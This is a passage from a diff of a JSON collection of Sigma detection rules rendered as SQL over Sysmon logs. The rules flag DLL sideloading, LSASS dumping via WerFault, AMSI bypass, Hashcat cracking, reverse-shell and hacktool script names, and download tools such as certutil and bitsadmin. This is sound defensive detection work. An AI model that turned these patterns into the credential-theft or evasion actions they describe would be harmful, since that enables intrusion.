2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR 